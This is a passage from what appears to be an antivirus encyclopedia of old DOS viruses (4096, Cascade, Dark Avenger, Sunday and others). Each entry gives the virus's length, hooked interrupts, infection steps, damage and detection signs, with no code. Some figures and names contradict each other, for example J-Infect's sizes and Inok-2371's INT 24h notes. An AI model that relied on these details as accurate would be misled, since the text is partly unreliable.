  9620. [4096]
  9621. Virus Name: Virus 4096
  9622. Virus Type: File Virus
  9623. Virus Length: 4096 bytes
  9624.  
  9625. Execution Procedure: A boot sector will be modified if the system date
  9626. is later than September 21. The text "FRODO LIVES" will then appear on
  9627. the screen after booting from a modified disk. The virus code is
  9628. corrupted so that when you run the infected file after September 21,
  9629. the system areas will not be modified, but the virus will cause the
  9630. system to crash.
  9631.  
  9632. Damage: Virus infects .COM files shorter than 61440 bytes and .EXE
  9633. files. As a flag virus, it increases the year in the file's time stamp
  9634. by 100 years. (DOS reports only the last two digits, so it cannot be
  9635. easily recognized when, for example, the "DIR" command is executed).
  9636.  
  9637. Detection Method: The virus increases infected file size by 4096
  9638. bytes. The operating memory is decreased by about 6 KB.
  9639.  
  9640. [534]
  9641. Virus Name: 534
  9642. Virus Type: Parasitic Virus
  9643. Virus Length: 534 bytes
  9644.  
  9645. Symptoms: Virus infects .COM files in the current directory or root
  9646. directory that are longer than 256 bytes and shorter than 64000 bytes.
  9647. Increases infected file size by 534 bytes and the file contains the
  9648. string "????????.COM".
  9649.  
  9650. [April 1st]
  9651. Virus Name: April 1st
  9652. Other Names: None
  9653. Virus Type: File Virus
  9654. Virus Length: 1488 bytes
  9655.  
  9656. Execution Procedure:
  9657. 1) The virus checks whether it is already loaded resident in the
  9658.     memory. If it is not, it loads itself by hooking INT 21h.
  9659. 2) Next, it executes the original file.
  9660. 3) Once it is resident in the memory it will infect any uninfected
  9661.     file that is executed.
  9662.  
  9663. Damage: On April 1, the virus displays the message "APRIL 1ST HA HA HA
  9664. YOU HAVE A VIRUS." After displaying the message, the virus halts the
  9665. system.
  9666.  
  9667. Detection Method: April 1st increases the size of .EXE files by 1488
  9668. bytes. Infected file contains the string "SURIV." Check to see if the
  9669. file named "BUG.DAT" exists hidden in the C:\ directory.
  9670.  
  9671. Notes: Loads itself resident in the memory. An error message appears
  9672. if an I/O error (such as write protect) occurs.
  9673.  
  9674. [Autumn]
  9675. Virus Name: Autumn
  9676. Other Names: Virus 1701, Cascade-B
  9677. Virus Type: Parasitic Virus, RAM resident
  9678. Virus Length: 1701 bytes
  9679. PC Vectors Hooked: Int 21
  9680.  
  9681. Execution Procedure:
  9682. 1) The virus checks whether it is already loaded resident in the
  9683.     memory. If it isn't, it loads itself by hooking INT 21h.
  9684. 2) Next, it executes the original file.
  9685. 3) Once it is resident in the memory it will infect any uninfected
  9686.     file that is executed.
  9687.  
  9688. Damage: The Autumn virus causes characters to "fall down" the screen
  9689. (Video-RAM modification). This does not happen frequently at the
  9690. beginning but, as time goes by, the frequency of both the "fall down"
  9691. and sound effects will increase. Semigraphic characters do not fall.
  9692. Characters cannot fall over different video attributes. It doesn't
  9693. work on monochrome monitors. The virus sometimes causes the computer
  9694. to crash.
  9695.  
  9696. Detection Method: Infected files increase in size by 1701 bytes.
  9697.  
  9698. Notes: Loads itself resident in the memory. An error message appears
  9699. if an I/O error (such as write protect) occurs.
  9700.  
  9701. [Bogus-B]
  9702. Virus Name: BOGUS-B
  9703. Virus Type: File Virus (.COM and .EXE files) and
  9704.             Partition Table Infector
  9705. Virus Length: No change
  9706.  
  9707. PC Vectors Hooked: INT 21h, INT 24h, INT 13h
  9708.  
  9709. Infection Process:
  9710. 1) When you execute a file infected with the Bogus-B virus, it will
  9711.     check to see whether Sector #1 has been infected. If not, the virus
  9712.     will proceed to infect sector #1.
  9713. 2) Next, it checks whether it is loaded resident in the memory. If it
  9714.     isn't, it loads itself by hooking INT 21h and INT 13h, and then
  9715.     executes the original file.
  9716. 3) Once resident in the memory, the BOGUS-B virus can infect any
  9717.     executable programs.
  9718.  
  9719. Damage: When the number of infected files exceeds 2710h, BOGUS-B
  9720. destroys all data on the hard disk.
  9721.  
  9722. Detection Method: Check to see if the file head is INT 13h (AX=90 or
  9723. 91). If it is, check whether INT 21h is hooked. a) When starting the
  9724. system, make 21_flag=3. b) Check whether INT 21h is called by other
  9725. programs; if "yes", 21_flag is decreased by 1. c) When 21_flag=0,
  9726. BOGUS hooks INT 21h to infect other files. 2) Check for any attempts
  9727. to read sector #1; if there is, then display the original data of
  9728. sector #1. 3) Check whether AX=90 or 91; if "yes", then execute the
  9729. real interrupt.
  9730.  
  9731. Notes: BOGUS hooks INT 24h when infecting files. It omits I/O errors
  9732. (such as write protect).
  9733.  
  9734. [Bulgarian Virus]
  9735. Virus Name: Bulgarian Virus
  9736. Other Names: Virus 1800, Sofia virus, Dark Avenger
  9737. Virus Type: Parasitic Virus and Boot Strap Sector Virus
  9738. Virus Length: Approx. 1800 bytes
  9739. PC Vectors Hooked: Int 21
  9740.  
  9741. Infection Process:
  9742. 1) The virus checks whether it is already loaded resident in the
  9743.     memory. If it's not, it loads itself by hooking INT 21h.
  9744. 2) The virus then executes the original file.
  9745. 3) Once it is resident in the memory the virus will infect any
  9746.     uninfected file that is executed.
  9747.  
  9748. Damage: The virus reads the disk's boot sector, and (offset 10, OEM
  9749. decimal version) marks the number of programs which were executed
  9750. from the disk MOD 16. If it is zero (after every 16 programs!!),
  9751. it overwrites a random cluster on the disk with part of its own
  9752. code. The cluster number is then stored in the boot sector at offset
  9753. 8 (OEM main version). The modified boot sector is then written back
  9754. onto the disk.
  9755.  
  9756. Detection Method: Infected files increase by 1800 bytes.
  9757.  
  9758. Notes:
  9759. 1) Loads itself resident in the memory.
  9760. 2) Doesn't hook INT 24h when infecting files. An error message appears
  9761.     if an I/O error (such as write protect) occurs.
  9762.  
  9763. [Cannabis-B]
  9764. Virus Name: Cannabis-B
  9765. Virus Type: File Infector
  9766. Virus Length: None
  9767. PC Vectors Hooked: None
  9768.  
  9769. Execution Procedure: When a file infected with this virus is executed,
  9770. a boot virus "Cannabis" is written onto the boot sector of the A
  9771. drive.
  9772.  
  9773. Damage: see Execution Procedure above.
  9774.  
  9775. Detection Method: None
  9776.  
  9777. Notes: Cannabis doesn't hook INT 24h when infecting files. It omits
  9778. I/O errors (such as write protect).
  9779.  
  9780. [Christmas]
  9781. Virus Name: Christmas
  9782. Other Namess: Virus 600, Xmas In Japan, Japanese Christmas
  9783. Virus Type: File Virus (.COM files)
  9784. Virus Length: 600 bytes
  9785.  
  9786. Damage: When a file infected with this virus is executed on December
  9787. 25, the following message will be displayed:
  9788.  
  9789. "A Merry christmas to you" or "Jingo Bell, jingo bell, jingo all
  9790. the way."
  9791.  
  9792. Detection Method: The COMMAND.COM file increases in size by 600
  9793. bytes and infected .COM files increase in size by 600 bytes.
  9794.  
  9795. [Comp-3351]
  9796. Virus Name: Comp-3351
  9797. Virus Type: Parasitic Virus
  9798. Virus Length: 3351 bytes
  9799.  
  9800. Execution Process:
  9801. Comp-3351 searches for an .EXE file in the current directory. It then
  9802. creates a .COM file (hidden file) using the same file name as the .EXE
  9803. file. The .COM file contains the virus code with length equivalent
  9804. to 3351 bytes.
  9805.  
  9806. Damage: None
  9807.  
  9808. Detection Method: Length of the file is 3351 bytes.
  9809.  
  9810. Remarks:
  9811. 1) Non-memory resident.
  9812. 2) The virus file is compressed and cannot be recognized before
  9813.    decompression (similar to PKLITE).
  9814.  
  9815.  
  9816. [Como-B]
  9817. Virus Name: Como-B
  9818. Virus Type: File Virus (.EXE files)
  9819. Virus Length: 2020 bytes
  9820.  
  9821. PC Vectors Hooked: None
  9822.  
  9823. Execution Procedure:
  9824. 1) Searches for an .EXE file in the current directory and, once it
  9825.     locates one, it checks whether it has been infected by COMO-B.
  9826.     If the file is already infected, the virus continues to look for
  9827.     any uninfected .EXE file.
  9828. 2) COMO-B infects files one at a time.
  9829. 3) After infecting three files, the following message appears:
  9830.  
  9831.     "This is the ...COMO-LAKE .. virus(rel . 1 1).........I'm a
  9832.     non-destructive virus developed to study the worldwide diffusion
  9833.     rate. I was released in September 1990 by a software group
  9834.     resident near Como lake (north Italy) .....Don't worry about your
  9835.     data on disk. My activity is limited only .. to auto-transferring
  9836.     into other program files. Perhaps you've got .. many files
  9837.     infected. Press a key to execute the prompt.
  9838.  
  9839. Damage: None
  9840.  
  9841. Detection Method: Infected files increase by 2020 bytes.
  9842.  
  9843. Notes:
  9844. 1) Doesn't stay resident in the memory.
  9845. 2) COMO doesn't hook INT 24h when infecting files. An error message
  9846.     appears if an I/O error (such as write protect) occurs.
  9847.  
  9848. [D-Tiny]
  9849. Virus Name: D-TINY
  9850. Virus Type: Memory Resident, File Infector (.COM files)
  9851. Virus Length: 126 bytes
  9852. PC Vectors Hooked: INT 21h
  9853.  
  9854. Infection Procedure:
  9855. 1) If it isn't loaded resident in the memory, D-Tiny loads itself by
  9856.     hooking INT 21h.
  9857. 2) Next, it executes the original file.
  9858. 3) Once it is resident in the memory it will infect any uninfected
  9859.     file that is executed. It doesn't infect .EXE files.
  9860.  
  9861. Damage: None
  9862.  
  9863. Detection Method: Infected .COM files increase by 126 bytes.
  9864.  
  9865. Notes: D-TINY doesn't hook INT 24h when infecting files. An error
  9866. message appears if an I/O error (such as write protect) occurs.
  9867.  
  9868.  
  9869. [Dark_Avenger]
  9870. Virus Name: Dark_Avenger
  9871. Alias: Eddie
  9872. Virus Type: File Infector (.COM and .EXE files)
  9873. Virus Length: 1,800 bytes
  9874. PC Vectors Hooked: INT 21h
  9875.  
  9876. Infection method: When an infected file is executed, the virus loads
  9877. itself in the memory. While loaded, it infects accessed, executable
  9878. files. Infected files increase by 1800 bytes.
  9879.  
  9880. Damage: The virus reads the disk's boot sector and marks the number
  9881. of programs executed from the disk. After every 16 programs, it
  9882. overwrites a random cluster on the disk with part of its own code.
  9883. The infected files contain these strings:
  9884.  
  9885. "Eddie lives...somewhere in time! Diana P."
  9886.  
  9887. "This program was written in the city of Sofia (C) 1988-89 Dark
  9888. Avenger."
  9889.  
  9890. [Data Crime IIB]
  9891. Virus Name: Datacrime II b
  9892. Other names: None
  9893. Virus Type: File Virus
  9894. Virus Length: 1460 bytes
  9895.  
  9896. Damage: The virus will low-level format cylinder 0 of your hard disk
  9897. after October 12.
  9898.  
  9899. Detection Method: Between October 12-31, excluding Mondays, the virus
  9900. will display the following message: "DATACRIME-2 VIRUS." The virus will
  9901. then low-level format cylinder 0 of the hard disk. The system will then
  9902. halt.
  9903.  
  9904.  
  9905. [Deiced]
  9906. Virus Name: Deiced
  9907. Virus Type: File Infector, Highest Memory Resident ( .COM files only)
  9908. Virus Length: 2333 bytes
  9909. PC Vectors Hooked: INT 21h, INT 24h
  9910.  
  9911. Execution Procedure:
  9912. 1) Checks whether or not the virus has been loaded resident in the high
  9913.     memory. If not, it loads itself onto the highest memory by hooking
  9914.     INT 21h.
  9915. 2) It checks whether the file COMMAND.COM has been infected.
  9916.     If not, the virus infects it.
  9917. 3) Deiced checks the system date and, if it is the 15th of January,
  9918.     April or August, the virus will damage all files on the system disk.
  9919.  
  9920. Infection Procedure: The virus infects a .COM file by hooking the
  9921. AX=4B00h call (if the file is not infected). When the command "DIR"
  9922. is executed, the virus will look for all uninfected files in the
  9923. directory and proceed to infect them. Deiced hooks INT 24h to hide
  9924. itself while infecting.
  9925.  
  9926. Damage: If the system date is the 15th of January, April or August,
  9927. the virus will damage all files on the system disk.
  9928.  
  9929. Detection Method: Infected files increase by 2333 bytes.
  9930.  
  9931.  
  9932. [Dropper-4]
  9933. Virus Name: DROPPER-4
  9934. Virus Type: File Infector (.COM and .EXE files)
  9935. Virus Length: 1125 bytes
  9936. PC Vectors Hooked: INT 24h
  9937.  
  9938. Execution Procedure:
  9939. 1) The virus searches for an uninfected .COM or .EXE file in the
  9940.     current directory.
  9941. 2) Infects files in the current directory two at a time.
  9942. 3) Executes the original file.
  9943.  
  9944. Damage: None
  9945.  
  9946. Detection Method: Infected files increase by 1125 bytes.
  9947.  
  9948. Notes:
  9949. 1) Doesn't stay resident in the memory.
  9950. 2) Dropper-4 hooks INT 24h when infecting files. It omits I/O
  9951.     errors (such as write protect).
  9952.  
  9953. [Ell]
  9954. Virus Name: ELL
  9955. Other names: None
  9956. Virus Type: File Infector (.COM and .EXE files)
  9957. Virus Length: 1237-1246 bytes (EXE files)
  9958.               1237 bytes (COM files)
  9959.  
  9960. PC Vectors Hooked: INT 21h
  9961.  
  9962. Execution Procedure:
  9963. 1) Checks whether or not it is memory resident. If not, it loads
  9964.    itself resident in the memory by hooking INT 21h.
  9965. 2) It then executes the original file.
  9966. 3) Once resident in the memory it will infect any uninfected file
  9967.    that is executed.
  9968.  
  9969. Damage: None
  9970.  
  9971. Detection Method: Increases infected file size by 1237/1246 bytes.
  9972.  
  9973. Notes:
  9974. Loads itself resident in the memory. An error message appears if
  9975. there is an I/O error (such as write protect).
  9976.  
  9977.  
  9978. [Elvis]
  9979. Virus Name: Elvis
  9980. Virus Type: File Infector (.COM files)
  9981. Virus Length: 1250 bytes
  9982.  
  9983. PC Vectors Hooked: INT 8h
  9984.  
  9985. Execution Procedure:
  9986. 1) The virus searches for uninfected COM files in the current
  9987.    directory, and infects them three at a time.
  9988. 2) Hooks INT 8h and executes the original file.
  9989.  
  9990. Damage: About eight (8) minutes after the virus is executed, one of
  9991. these messages appears on the screen: 1) "Elvis lives!" 2) "ELVIS is
  9992. watching!" 3) "Don maybe he lives here!.....," and so on.
  9993.  
  9994. Detection Method: Infected files increase by 1250 bytes.
  9995.  
  9996. Notes:
  9997. 1) Doesn't stay resident in the memory.
  9998. 2) Elvis doesn't hook INT 24h when infecting files. It omits I/O errors
  9999.    (such as write protect).
  10000.  
  10001.  
  10002. [F3]
  10003. Virus Name: F3
  10004. Virus Type: Memory Resident, File Virus (.COM and .EXE files)
  10005. Virus Length: 50406 bytes
  10006.  
  10007. PC Vectors Hooked: INT 21h, AX=4B00h (execute program), INT 24h
  10008.  
  10009. Infection Procedure:
  10010. 1) Checks whether it is memory resident. If not, it loads itself
  10011.    resident in the highest memory by hooking INT 21h.
  10012. 2) Checks the system date. If the date is April 1, two lines of code
  10013.    will appear on the screen.
  10014. 3) Executes the original file.
  10015. 4) Once memory resident it will infect any uninfected file that is
  10016.    executed.
  10017.  
  10018. Damage: None
  10019.  
  10020. Detection Method: Infected files increase by 50406 bytes.
  10021.  
  10022. Notes: The F3 virus hooks INT 24h when infecting files. It omits I/O
  10023. errors (such as write protect).
  10024.  
  10025.  
  10026. [Flip-B]
  10027. Virus Name: Flip-B
  10028. Virus Type: File and Partition Table Infector Virus
  10029. Virus Length: 2153 bytes
  10030.  
  10031. PC Vectors Hooked: INT 21h, INT 24h, INT 1Ch
  10032.  
  10033. Execution Procedure:
  10034. 1) When you execute a file infected with Flip-B, the virus checks
  10035.    whether Sector #1 on the hard drive is infected. If not, the virus
  10036.    infects it.
  10037. 2) Checks whether it is memory resident. If not, it loads itself
  10038.    resident in the memory by hooking INT 21h and INT 1Ch.
  10039. 3) It infects files as they are executed.
  10040.  
  10041. Damage: You may not be able to boot up the machine from the hard disk.
  10042.  
  10043. Detection Method: Infected files increase by 2153 bytes.
  10044.  
  10045. INT 1Ch: Detects whether INT 21h is constantly hooked by another
  10046. program.
  10047.  
  10048. Notes: Flip-B hooks INT 24h when infecting files, omitting I/O errors
  10049. such as write protect.
  10050.  
  10051.  
  10052. [Gp 1]
  10053. Virus Name: Gp1
  10054. Virus Type: Network Specific Virus
  10055. Virus Length: 1557 bytes (EXE files)
  10056.               1845 bytes (COM files)
  10057.  
  10058. Execution Procedure:
  10059. 1) Checks whether it is memory resident. If not, it loads itself
  10060.    resident in the highest memory by hooking INT 21h.
  10061. 2) Executes the original file.
  10062. 3) Once memory resident it will infect any uninfected file that
  10063.    is executed.
  10064.  
  10065. Symptoms: If the virus is active in the memory and if the first
  10066. character on the command line is not an "i", the virus removes itself
  10067. from the operating memory (this will work only if the virus is the last
  10068. TSR to change interrupt vector 21h) and displays the message "GP1
  10069. Removed from memory."
  10070.  
  10071. Damage: None. Gp1 is the only known LAN virus. This unique virus is a
  10072. modification of the Jerusalem virus and was created for one special
  10073. purpose: to penetrate Novell security features and spread inside the
  10074. network. The virus does not contain any manipulation (if we do not
  10075. count the monitoring of Novell LOGIN and the attempts to break the
  10076. Novell security features).
  10077.  
  10078. [Hiccup]
  10079. Virus Name: Hiccup
  10080. Aliases: Comp-3351
  10081. Virus Type: Parasitic Virus (infects .EXE files)
  10082. Virus Length: 3351 bytes
  10083.  
  10084. Execution Procedure:
  10085. 1) Hiccup searches for an .EXE file in the current directory.
  10086. 2) Creates a *.COM file (hidden file) consisting of the virus itself.
  10087.     When executed, the *.COM file executes, then returns to the
  10088.     original routine.
  10089.  
  10090. Damage: None
  10091.  
  10092. Detection Method: File length is 3351 bytes.
  10093.  
  10094. Notes:
  10095. 1) Non-memory resident.
  10096. 2) The virus file is compressed and cannot be recognized without
  10097.     decompression (similar to PKLITE).
  10098.  
  10099. [Icelandic]
  10100. Virus Name: Icelandic
  10101. Other names: Saratoga
  10102. Virus Type: File Virus
  10103. Virus Length: 642 bytes (EXE)
  10104.  
  10105. Execution Procedure:
  10106. 1) Checks whether it is memory resident. If not, it loads itself
  10107.     resident in the memory by hooking INT 21h.
  10108. 2) It then executes the original file.
  10109. 3) Once memory resident it will infect any uninfected file that is
  10110.     executed. Doesn't infect .COM files.
  10111.  
  10112. Damage: Infected .EXE files increase by 642 bytes.
  10113.  
  10114. Note:
  10115. 1) The virus loads itself resident in the memory.
  10116. 2) Doesn't hook INT 24h when infecting files.
  10117. 3) An error message appears if an I/O error (such as write protect)
  10118.     occurs.
  10119.  
  10120. [Inok-2371]
  10121. Virus Name: Inok-2371
  10122. Virus Type: Parasitic Virus
  10123. Virus Length: Infected .COM files increase by 2372 bytes
  10124.                      (does not infect EXE files)
  10125. PC Vectors Hooked: None
  10126.  
  10127. Execution Procedure: Randomly does one of the following:
  10128. 1) Searches for an uninfected .COM file in the current directory.
  10129.     Infects the file if there is one (infects only one file at a
  10130.     time), and/or executes the host program.
  10131. 2) Creates a file named ICONKIN.COM in the current directory and then
  10132.     runs it. (It will not infect any files. It will display a small
  10133.     window repeatedly until a key is pressed. And, the small window
  10134.     will show up after a period of time. While the small window is on
  10135.     the screen, everything will be forced to wait.)
  10136.  
  10137. Infection Procedure:
  10138. 1) The virus infects files by AH=4B in INT 21h. When an uninfected
  10139.     file is executed, the virus infects it.
  10140. 2) Lycee hooks INT 24h before infecting files to ignore I/O errors.
  10141.  
  10142. Damage: Refer to Execution Procedure 2).
  10143.  
  10144. Detection Method:
  10145. 1) Check for the small window described in Execution Procedure 2).
  10146. 2) Infected files increase by 2372 bytes.
  10147.  
  10148. Remarks:
  10149. 1) Non-memory resident.
  10150. 2) When infecting files, the virus does not hook INT 24h. An error
  10151.     message will appear when I/O errors occur.
  10152.  
  10153. [J-Infect]
  10154. Virus Name: J-Infect
  10155. Virus Type: Memory Resident, File Virus (.COM and .EXE files)
  10156. Virus Length: 12080 bytes
  10157.  
  10158. PC Vectors Hooked: INT 21h
  10159.  
  10160. Execution Procedure:
  10161. 1) This is similar to the "JERUSALEM" virus in that it infects the same
  10162.    types of files.
  10163.  
  10164. Detection Method: Infected files increase by 10280 bytes.
  10165.  
  10166.  
  10167. [Joanna]
  10168. Virus Name: JOANNA
  10169. Aliases: None
  10170. Virus Type: File Infector
  10171. Virus Length: 986 bytes
  10172.  
  10173. Execution Procedure:
  10174. 1) Checks whether it is memory resident. If not, it loads itself
  10175.     resident in the memory by hooking INT 21h.
  10176. 2) It then executes the original file.
  10177. 3) Once memory resident it will infect any uninfected file that is
  10178.     executed.
  10179.  
  10180. Detection Method:
  10181. 1) Virus displays the message "I love you Joanna, Apache...."
  10182. 2) Infected files increase by 986 bytes.
  10183.  
  10184. Note: Loads itself resident in the memory. An error message appears
  10185. if an I/O error (such as write protect) occurs.
  10186.  
  10187. [July 4]
  10188. Virus Name: July 4, Stupid 1
  10189. Virus Type: File Infector (.COM files)
  10190. Virus Length: 743 bytes
  10191.  
  10192. Execution Procedure:
  10193. 1) If the word at address 0000:01FEh is FFFFh, the virus will not
  10194.     infect any file. Otherwise, it infects all uninfected .COM files
  10195.     on the current directory. If the number of infections is less than
  10196.     2, it will proceed to infect .COM files on the upper directory
  10197.     until more than two files are infected or until it has reached the
  10198.     root directory.
  10199. 2) If the current date is July 4 and current time is either 0:00am,
  10200.     1:00am, 2:00am, 3:00am, 4:00am, or 5:00am, the virus will destroy
  10201.     data on the current diskette.
  10202.  
  10203. Detection Method:
  10204. 1) The date and time fields of infected files are changed.
  10205. 2) The byte at 0003h of an infected .COM file is 1Ah.
  10206. 3) Infected .COM files display one of the following messages:
  10207.     "Abort, Retry, Ignore, Fail?" , "Fail on INT 24"
  10208.     (2) - "Impotence error reading users disk"
  10209.     (0) - "Program too big to fit in memory"
  10210.     (1) - "Cannot load .COMMAND, system halted"
  10211.     (3) - "Joker!" and "*.com."
  10212.  
  10213. [K]
  10214. Virus Name: N1
  10215. Virus Type: COM File infector
  10216. Virus Length: 10230-10240 bytes
  10217.  
  10218. Execution Procedure:
  10219. 1) Searches for an uninfected COM file in the current directory, then
  10220.    infects it (only infects one file at a time).
  10221. 2) It then displays the following message:
  10222.  
  10223.    "This File Has Been Infected By NUMBER One!"
  10224.  
  10225. Damage: None
  10226.  
  10227. Note:
  10228. 1) It does not stay resident in the memory.
  10229. 2) An error message will appear when writing because INT 24h has not
  10230.    been hanged.
  10231.  
  10232. Detection Method:
  10233. 1) Infected files will display the above message when executed.
  10234.  
  10235. [Kill COM]
  10236. Virus Name: Killcom
  10237. Virus Type: File Virus
  10238. Virus Length: 31648 Bytes
  10239. PC Vectors Hooked: None
  10240.  
  10241. Execution Procedure:
  10242. 1) Looks for COMMAND.COM in the current directory of C:\.
  10243. 2) If found, corrupts this file. If not, creates a COMMAND.COM file
  10244.     with 213 Bytes.
  10245.  
  10246. Damage: Corrupts the COMMAND.COM file in the current directory of
  10247. C:\.
  10248.  
  10249. Detection Method: None
  10250.  
  10251. Note:
  10252. 1) Doesn't stay resident in the memory.
  10253. 2) Doesn't hook INT 24h when infecting files. An error message
  10254.     appears if there is an I/O error (such as write protect).
  10255.  
  10256. [LB-Demonic]
  10257. Virus Name: lb-Demonic
  10258. Virus Type: File Virus (infects .COM files)
  10259. Virus Length: No change
  10260. PC Vectors Hooked: None
  10261.  
  10262. Execution Procedure:
  10263. 1) Infects all uninfected .COM files in the current directory.
  10264. 2) When the file is executed this message appears: "EXEC FAILURE"
  10265. 3) Checks the system date. If it is Tuesday, the virus renames
  10266.     COMMAND.COM in C:\ to COMMAND.C0M ("O" in .COM changed to "0").
  10267. 4) Displays this message: "Error reading drive C:\ ... BillMeTuesday"
  10268.  
  10269. Damage:
  10270. 1) Renames COMMAND.COM to COMMAND.C0M, so the system can't start
  10271.     from the disk.
  10272. 2) Overwrites original files, so infected files won't increase in
  10273.     length.
  10274.  
  10275. Note:
  10276. 1) Doesn't stay resident in the memory.
  10277. 2) Doesn't hook INT 24h when infecting files. Error message appears
  10278.     if there is an I/O error (such as write protect).
  10279.  
  10280. [Mixer 1A]
  10281. Virus Name: Mixer 1A
  10282. Other names: Virus 1618
  10283. Virus Type: File Virus
  10284. Virus Length: Approximately 1618 bytes
  10285. PC Vectors Hooked: Int 21
  10286.  
  10287. Execution Procedure:
  10288. 1) Checks whether it is memory resident. If not, it loads itself
  10289.     resident in the memory by hooking INT 21h.
  10290. 2) It then executes the original file.
  10291. 3) Once memory resident, it will infect any uninfected file that is
  10292.     executed.
  10293.  
  10294. Damage: The mixture of characters sent to the serial or parallel port
  10295. using BIOS functions is the main damage routine of this virus. All
  10296. bytes sent to the port are translated using the virus' own table.
  10297.  
  10298. Fifty (50) minutes after the virus is installed into memory, the
  10299. keyboard routine is activated. From this time on, CapsLock will be
  10300. set to OFF, and Numlock will be set to ON. The virus will check
  10301. whether the "Ctrl", "Alt", and "Del" keys are simultaneously
  10302. depressed. If this is the case, the virus will suppress the "Alt"
  10303. command and activate a routine for screen manipulation. However, the
  10304. virus will call the routine in the wrong manner.
  10305.  
  10306. In text mode, the virus changes all attributes of video page 0. It will
  10307. add 1 to all attributes and after 256 the virus will reset itself. Sixty
  10308. (60) minutes after the virus is installed in the memory, it will display
  10309. a bouncing ball similar to the one seen in the Ping-Pong virus. The ball
  10310. is marked "o" and its movement is controlled by the BIOS (interrupt 10h).
  10311.  
  10312. Note:
  10313. 1) An error message appears if there is an I/O error (such as
  10314.     write protect).
  10315.  
  10316. [Multi-2B]
  10317. Virus Name: Multi-2-B
  10318. Virus Type: File Virus (infects .COM and .EXE files) and
  10319.                    Partition Table Infector
  10320. Virus Length: 927 Bytes (COM files), about 1000 Bytes (EXE files)
  10321. PC Vectors Hooked: INT 21h, INT 24h, INT 1Ch, INT 13h
  10322.  
  10323. Execution Procedure:
  10324. 1) When you execute an infected file, the virus infects Sector #1 (if
  10325.     not yet infected) of the hard disk.
  10326. 2) Checks whether it is memory resident. If not, it infects Sector #1
  10327.     and then exits. If it is, executes the original program.
  10328.  
  10329. Damage: None
  10330.  
  10331. Detection Method: Infected files increase by 927-1000 Bytes.
  10332.  
  10333. Note:
  10334. 1) Multi-2 hooks INT 24h when infecting files.
  10335. 2) Omits I/O errors (such as write protect).
  10336.  
  10337.  
  10338. [Necro-B]
  10339. Virus Name: Necro-B
  10340. Virus Type: File Virus (infects .EXE and .COM files)
  10341. Virus Length: 696 Bytes (COM and EXE)
  10342. PC Vectors Hooked: None
  10343.  
  10344. Execution Procedure:
  10345. 1) Searches for uninfected .COM and .EXE files in the current
  10346.     directory, and infects them three files at a time.
  10347.  
  10348. Damage: None
  10349.  
  10350. Detection Method:
  10351. 1) Infected files increase by 696 Bytes.
  10352.  
  10353. Note:
  10354. 1) Doesn't stay resident in the memory.
  10355. 2) Doesn't hook INT 24h when infecting files. Error message
  10356.     appears if there is an I/O error (such as write protect).
  10357. 3) Infected files can't execute or infect other files.
  10358.  
  10359.  
  10360. [No Wednesday]
  10361. Virus Name: NO-WEDNESDAY
  10362. Virus Type: File Virus (infects .COM files)
  10363. Virus Length: 520 Bytes (COM)
  10364. PC Vectors Hooked: INT 24h
  10365.  
  10366. Execution Procedure:
  10367. 1) Searches for uninfected COM files in the current directory and
  10368.     infects them one at a time.
  10369. 2) Displays the message: "file not found."
  10370.  
  10371. Damage: Infected files can not execute original file.
  10372.  
  10373. Detection Method:
  10374. 1) Infected files increase by 520 Bytes.
  10375. 2) "file not found" message appears on the screen.
  10376.  
  10377. Note:
  10378. 1) Doesn't stay resident in the memory.
  10379. 2) Hooks INT 24h when infecting files. Omits I/O error (such as
  10380.     write protect).
  10381.  
  10382. [Prudent]
  10383. Virus Name: Prudent
  10384. Other names: 1210
  10385. Virus Type: File Virus
  10386. Virus Length: 1210 bytes (EXE files)
  10387.  
  10388. Execution Procedure:
  10389. 1) Checks whether it is memory resident. If not, it loads itself
  10390.     resident in the memory by hooking INT 21h.
  10391. 2) It then executes the original file.
  10392. 3) Once memory resident it will infect any uninfected file that is
  10393.     executed. Doesn't infect .COM files.
  10394.  
  10395. Damage: Overwrites original files.
  10396.  
  10397. Detection Method: From May 1-4, the virus will frequently check the
  10398. disk, thus causing abnormal disk activity.
  10399.  
  10400. Note:
  10401. 1) Loads itself resident in the memory.
  10402. 2) An error message appears if there is an I/O error (such as write
  10403.     protect).
  10404.  
  10405. [Sandwich]
  10406. Virus Name: SANDWICH
  10407. Virus Type: Highest Memory Resident, File Virus (infects .COM files)
  10408. Virus Length: 1172 Bytes (COM)
  10409. PC Vectors Hooked: INT 21h, AX=4B00h (execute program)
  10410.  
  10411. Infection Procedure:
  10412. 1) Checks whether it is memory resident. If not, it loads itself
  10413.     resident in the memory by hooking INT 21h.
  10414. 2) It then executes the original file.
  10415. 3) While memory resident it infects any uninfected file that is
  10416.     executed. Doesn't infect .EXE files.
  10417.  
  10418. Damage: None
  10419.  
  10420. Detection Method: Infected files increase by 1172 Bytes.
  10421.  
  10422. Note: The Sandwich virus doesn't hook INT 24h when infecting files.
  10423. An error message appears if there is an I/O error (such as write
  10424. protect).
  10425.  
  10426. [Scythe-2d]
  10427. Virus Name: Scythe-2d
  10428. Virus Type: Boot Virus
  10429. PC Vectors Hooked: INT 13h
  10430.  
  10431. Execution Procedure:
  10432. 1) Modifies the memory size, decreasing the real memory size by 1K.
  10433. 2) Installs itself resident in the memory (in the last 1K of the
  10434.     memory).
  10435. 3) Hooks INT 13h.
  10436. 4) Returns the control to DOS and the system boots normally.
  10437.  
  10438. Damage: None
  10439.  
  10440. Note:
  10441. 1) When booting the system with a floppy disk, the virus will first
  10442.     check whether the hard disk is infected. If not, the virus will
  10443.     infect it.
  10444. 2) INT 13h: checks for any request for the contents of the boot sector
  10445.     or partition table. If such request exists, the virus will return
  10446.     the uninfected, original data.
  10447.  
  10448. [Sunday]
  10449. Virus Name: Sunday
  10450. Other Names: None
  10451. Virus Type: Boot Strap Sector Virus (Memory Resident)
  10452. Virus Length: 1636 bytes
  10453.  
  10454. Damage: The infected system becomes unusable every Sunday.
  10455.  
  10456. Detection Method: Every Sunday, the virus displays the following
  10457. message: "Today is Sunday! Why do you work so hard? All work and no
  10458. play makes you a dull boy! Come on! Let's go out and have some fun!"
  10459.  
  10460. [The Silence of the Lamb!]
  10461. Virus Name: The Silence Of The Lamb!
  10462. Virus Type: Memory Resident, File Virus (COM files)
  10463. Virus Length: 555 bytes
  10464. PC Vectors Hooked: INT 21h, INT 24h
  10465.  
  10466. Execution Procedure:
  10467. 1) Checks whether it is still in the last memory block. If not, it
  10468.     stays resident in the high memory and returns to the original
  10469.     routine.
  10470.  
  10471. Infection Procedure:
  10472. 1) Encodes the first 200h bytes of the original file.
  10473. 2) Attaches them and the decoded codes at the end of the file.
  10474. 3) Encodes the virus code and writes them onto the first 200h bytes
  10475.     of the file.
  10476.  
  10477. Damage: None
  10478.  
  10479. Notes:
